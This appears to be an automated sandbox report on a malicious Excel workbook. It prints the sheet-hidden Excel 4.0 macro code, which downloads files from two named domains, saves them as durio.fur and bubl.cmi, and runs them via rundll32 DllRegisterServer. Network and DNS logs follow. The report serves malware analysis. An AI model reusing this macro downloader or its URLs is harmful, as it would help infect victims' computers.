                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                        OLE File "diagram-1878769052.xls"

                                                                                                                                                                        Indicators

                                                                                                                                                                        Has Summary Info:True
                                                                                                                                                                        Application Name:Microsoft Excel
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                                        Contains Workbook/Book Stream:True
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                                        Summary

                                                                                                                                                                        Code Page:1251
                                                                                                                                                                        Author:Grog
                                                                                                                                                                        Last Saved By:Grog
                                                                                                                                                                        Create Time:2006-09-16 00:00:00
                                                                                                                                                                        Last Saved Time:2021-05-20 07:01:36
                                                                                                                                                                        Creating Application:Microsoft Excel
                                                                                                                                                                        Security:0

                                                                                                                                                                        Document Summary

                                                                                                                                                                        Document Code Page:1251
                                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                                        Contains Dirty Links:False

                                                                                                                                                                        Streams

                                                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.292238966805
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.271901657689
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G r o g . . . . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 8 . E M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                        Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521343
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Book
                                                                                                                                                                        File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                        Stream Size:521343
                                                                                                                                                                        Entropy:2.00328702293
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                        Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                        Macro 4.0 Code

                                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,hallakjewelry.com/wR,VyQrkX/utka.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,founderscirclecapital.eu/BMqX,KrcdkQ4/utka.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\durio.fur,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,
                                                                                                                                                                        =BA17(),,,,,,,,,,,,,,,"=FORMULA(Doc2!BG28&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,"=FORMULA(Doc2!BG28&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,=BA25(),,,,,,CALL"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,=BA11(),,,,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,"=WORKBOOK.HIDE(""Doc3"",1)",,,"=WORKBOOK.HIDE(""Doc4"",1)",,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.7.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)=FORMULA(Doc2!BJ39&before.4.7.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)=RUN(Doc3!AW7)",,,

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jun 29, 2021 18:28:03.895050049 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.055289984 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.055460930 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.056447029 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.218389988 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.218791008 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.218815088 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.218837023 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.218852043 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.218924046 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.218951941 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.221026897 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.221112967 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.237998962 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.398602962 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.398679972 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.399516106 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.565725088 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.565762043 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.565785885 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.565818071 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.565841913 CEST44349736192.185.195.245192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.565877914 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.565927982 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.565936089 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.568288088 CEST49736443192.168.2.4192.185.195.245
                                                                                                                                                                        Jun 29, 2021 18:28:04.729792118 CEST44349736192.185.195.245192.168.2.4

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jun 29, 2021 18:27:45.914058924 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:45.961896896 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:47.088148117 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:47.144814014 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:47.423448086 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:47.483501911 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:49.867955923 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:49.923336029 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:51.056993008 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:51.106277943 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:52.017059088 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:52.064410925 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:53.081315041 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:53.139308929 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:58.671221972 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:58.725701094 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:27:59.856082916 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:27:59.934729099 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:00.236419916 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:00.294317007 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:00.296175957 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:00.411261082 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:01.309328079 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:01.386629105 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:02.325345993 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:02.371203899 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:03.343692064 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:03.392802000 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:03.833156109 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:03.890970945 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.293740034 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:04.341074944 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:04.349149942 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.395929098 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:04.576205015 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:04.644221067 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:05.489633083 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:05.535952091 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:06.598928928 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:06.647618055 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:07.400928020 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:07.447263956 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:08.304763079 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:08.362067938 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:08.525957108 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:08.572572947 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:09.907299042 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:09.954910994 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:12.053716898 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:12.100063086 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:13.724817038 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:13.786919117 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:15.094054937 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:15.140609980 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:16.186239004 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:16.244751930 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:16.391437054 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:16.455333948 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:36.909425974 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:37.088700056 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:37.694361925 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:37.834362030 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:38.345429897 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:38.407896042 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:38.434587002 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:38.494530916 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:38.921775103 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:38.984342098 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:39.543606997 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:39.598083019 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:40.170217037 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:40.230878115 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:40.700956106 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:40.758148909 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:41.275413036 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:41.325474024 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:41.752712965 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:41.801523924 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:42.945759058 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:43.004318953 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:43.539764881 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:43.600553036 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:51.656398058 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:51.723680973 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:28:51.862190962 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:28:51.918735027 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:29:00.610212088 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:29:00.667238951 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:29:26.552881956 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:29:26.618390083 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                                        Jun 29, 2021 18:29:27.537883043 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                                        Jun 29, 2021 18:29:27.600265026 CEST53575258.8.8.8192.168.2.4

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                        Jun 29, 2021 18:28:03.833156109 CEST192.168.2.48.8.8.80xf998Standard query (0)hallakjewelry.comA (IP address)IN (0x0001)
                                                                                                                                                                        Jun 29, 2021 18:28:04.576205015 CEST192.168.2.48.8.8.80xa968Standard query (0)founderscirclecapital.euA (IP address)IN (0x0001)

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                        Jun 29, 2021 18:28:03.890970945 CEST8.8.8.8192.168.2.40xf998No error (0)hallakjewelry.com192.185.195.245A (IP address)IN (0x0001)
                                                                                                                                                                        Jun 29, 2021 18:28:04.644221067 CEST8.8.8.8192.168.2.40xa968Name error (3)founderscirclecapital.eunonenoneA (IP address)IN (0x0001)

                                                                                                                                                                        HTTPS Packets

